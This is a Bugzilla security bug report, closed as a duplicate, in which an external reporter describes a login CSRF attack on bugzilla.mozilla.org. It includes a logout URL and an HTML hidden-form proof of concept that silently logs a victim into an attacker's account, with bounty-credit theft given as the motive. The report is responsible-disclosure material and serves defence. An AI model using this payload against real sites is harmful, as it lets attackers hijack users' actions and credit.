Switching a user to another account

RESOLVED DUPLICATE of bug 713926

Status

()

Bugzilla
User Accounts
RESOLVED DUPLICATE of bug 713926
4 years ago
4 years ago

People

(Reporter: Dawid Czagan, Unassigned)

Tracking

(Blocks: 1 bug)

unspecified
Bug Flags:
sec-bounty -

Details

(Whiteboard: [site:bugzilla.mozilla.org][reporter-external])

(Reporter)

Description

4 years ago
User Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; McAfee; MAARJS)

Steps to reproduce:

It is possible to log in the user to another account (CSRF attack). Steps to reproduce: User logs in to his account and then the following actions are performed:
1. Enter http://bugzilla.mozilla.org/index.cgi?logout=1 to log out the user.
2. Then log the user to another account. POC (for demonstration purposes with Submit button; normally sent automatically):

<html>
  <body>
    <form action="https://bugzilla.mozilla.org/index.cgi" method="POST">
      <input type="hidden" name="Bugzilla&#95;login" value="E-MAIL_ATTACKER" />
      <input type="hidden" name="Bugzilla&#95;password" value="PASSWORD_ATTACKER" />
      <input type="hidden" name="GoAheadAndLogIn" value="Log&#32;in" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

It is assumed, that E-MAIL_ATTACKER with PASSWORD_ATTACKER exists.

There might be different reasons for the attacker to launch this attack. An exemplary one is getting a credit/bounty for a submitted bug (The attacker logs the user into his account. The user thinks, that he uses his own account and submits a bug. The action is done from the attacker's account and the credit/bounty goes to the attacker).

Regards,
Dawid Czagan
Flags: sec-bounty?
Whiteboard: [site:bugzilla.mozilla.org][reporter-external][verif?]
Status: UNCONFIRMED → RESOLVED
Last Resolved: 4 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 713926

Updated

4 years ago
Blocks: 835424
Flags: sec-bounty? → sec-bounty-
Whiteboard: [site:bugzilla.mozilla.org][reporter-external][verif?] → [site:bugzilla.mozilla.org][reporter-external]

Updated

4 years ago
Group: bugzilla-security
You need to log in before you can comment on or make changes to this bug.